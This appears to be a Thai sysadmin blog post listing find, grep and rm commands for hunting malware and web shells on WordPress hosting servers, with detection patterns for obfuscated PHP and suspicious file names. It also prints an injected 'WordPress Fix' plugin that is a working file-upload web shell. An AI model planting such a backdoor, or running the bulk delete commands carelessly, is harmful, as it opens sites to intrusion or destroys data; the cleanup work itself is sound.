ป้องกันโดนยิงเครื่อง server
#การใช้ netstat ตรวจสอบการถูกยิงด้วย syn คำสั่ง netstat -ntu | grep SYN_RECV | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nrอันนี้จะบอกว่..
- Random Content
- RSS Feed
- Sitemap
find footprint script virus webhost server
find /home/*/domains/*/public_html/ -maxdepth 2 -type f -name '.htaccess' -print0 | xargs -0 grep -il '(py|exe|php)'
find /home/*/domains/*/public_html/ -maxdepth 2 -type f -name '.htaccess' -print0 | xargs -0 grep -il '(py|exe'
rm -f wp-content/uploads/brizy/*/assets/images/*/.htaccess
rm -f wp-content/uploads/brizy/*/assets/images/*/*/.htaccess
find . -type f -name '.htaccess' -print0 | xargs -0 grep -il '(py|exe' > htac.txt
#cat htac.txt | xargs -I{} sh -c 'rm -f {};'
find /home/*/domains/*/public_html/ -maxdepth 2 -type f -name '*.php' -print0 | xargs -0 grep -il 'Open Source Matters'
find /home/*/domains/*/public_html/ -maxdepth 2 -type f -name '*.php' -print0 | xargs -0 grep -il '=urldecode('
find /home/*/domains/*/public_html/ -maxdepth 1 -type f -name '*.php' -print0 | xargs -0 grep -il '_COOKIE\[3'
find /home/*/domains/*/public_html/ -maxdepth 1 -type f -name '*.php' -print0 | xargs -0 grep -il '_COOKIE;'
find /home/*/domains/*/public_html/ -type f -name '*.php' -print0 | xargs -0 grep -il 'Open Source Matters'
find /home/*/domains/*/public_html/ -type f -name '*.php' -print0 | xargs -0 grep -il '=urldecode('
find /home/*/domains/*/public_html/ -type f -name '*.php' -print0 | xargs -0 grep -il '_COOKIE\[3'
find /home/*/domains/*/public_html/ -type f -name '*.php' -print0 | xargs -0 grep -il '_COOKIE;'
find . -name "???????.php"
find . -type f -name '*.php' -print0 | xargs -0 grep -il '_COOKIE;'
find . -type f -name '*.php' -print0 | xargs -0 grep -il 'SylVxy'
find . -type f -name '*.php' -print0 | xargs -0 grep -il 'lock3'
find . -type f \( -name "2index.php" -o -name "radio.php" -o -name "lock360.php" -o -name "wp-login.php" -o -name "wp-l0gin.php" -o -name "l.php" -o -name "1index.php" \)
find . -type f \( -name "2index.php" -o -name "radio.php" -o -name "lock360.php" -o -name "wp-login.php" -o -name "wp-l0gin.php" -o -name "l.php" -o -name "1index.php" -o -name "indeex.php" -o -name "php.ini" -o -name "wp-god.php" -o -name "wp-options.php" -o -name "wp-secure.php" -o -name "wp-supports.php" -o -name "conf.php" -o -iname "class-loadering.Php" \)
find /home/*/domains/*/public_html/ -type f -name 'l.php' -print0 | xargs -0 ls -al
find ./ -type f -name '.*.php' -print0 | xargs -0 ls -al
#find ./ -type f -name '.*.php' | xargs -I{} sh -c 'rm -f {};'
find /home/*/domains/*/public_html/ -type f -name '.*.php' -print0 | xargs -0 ls -al
ls -al /home/*/domains/*/public_html/ | grep -w "l.php"
ls -al /home/*/domains/*/public_html/ | grep ".suspected"
find /home/*/domains/*/public_html/ -type f -name '*.suspected' -print
ls -al /home/*/domains/*/public_html/ | grep "wp-ver.php"
ls -al /home/*/domains/* | grep ".php"
ls -al /home/*/* | grep ".php"
ls -al /home/*/domains/* | grep ".htaccess"
ls -al /home/*/* | grep ".htaccess"
find /home/*/domains/*/public_html/ -maxdepth 2 -type f -name 'wp-config.php' -print0 | xargs -0 grep -il '@include'
find /home/*/domains/*/public_html/ -maxdepth 2 -type f \( -name 'wp-config.php' -o -name 'wp-settings.php' \) -print0 | xargs -0 head -5 |more
find /home/*/domains/*/public_html/ -type f -name '*.php' -print0 | xargs -0 grep -il 'Pz4='
find /home/*/domains/*/public_html/ -type f -name '*.php' -print0 | xargs -0 grep -il 'explode(base64_decode'
find /home/*/domains/*/public_html/ -type f -name '*.php' -print0 | xargs -0 grep -il '@clearstatcache'
ไฟล์โค้ดสคริปที่โดนยัดเข้ามา
//wp-content/plugins/fix/up.php
<?php
/**
* Plugin Name: WordPress Fix
*/
?>
<!DOCTYPE html>
<html>
<body>
<form action="" method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>
</body>
</html>
<?php
if(isset($_POST["submit"])) {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], './' . basename($_FILES["fileToUpload"]["name"]))) {
echo "The file ". htmlspecialchars(basename($_FILES["fileToUpload"]["name"])). " has been uploaded.";
}
}
?>
December 13, 2022
Blog | #Command #Find #Linux #Security
 |
Re-commend-เด็ด ๆ ต่อจาก find footprint script virus webhost server
How to install Squid for IP Proxy Server
ติดตั้ง squid รุ่นล่าสุด https://www.squid-cache.org/Versions/ cd /tmp wget http://www.squid-cache.org/Versions/v3/3.4/squid-3.4.9.tar.gz tar xvfz squ..
script Hide Header Referrer link
hide your referrer Create an anonymous link that will hide the HTTP Referer header. example https://domain.ltd/?https://www.google.com ..
Search replace with find, perl, sed Linux command
use “find” cgi/perl file in web server with directadmin find /home/*/domains/*/public_html/cgi-bin/ -iname *.cgi -ls find /home/*/domains/*/public_htm..
วิธี SSH ข้ามเซิฟเวอร์โดยไม่ใส่รหัสผ่าน
ยกตัวอย่างเช่น ssh จากเครื่อง A ไปเครื่อง B โดยไม่ใช้รหัสผ่านในการ ssh @เครื่อง A ssh-keygen -t rsa (มีอะไรขึ้นมาก็กด enter ผ่านไปให้หมด แล้วพิมพ์คำสั..
SSH login Alert Telegram bot
from https://github.com/vdeville/ssh-login-alert-telegram apt-get -y install git cd /opt/ && git clone https://github.com/vdeville/ssh-login-alert-tel..
- Magicz?~
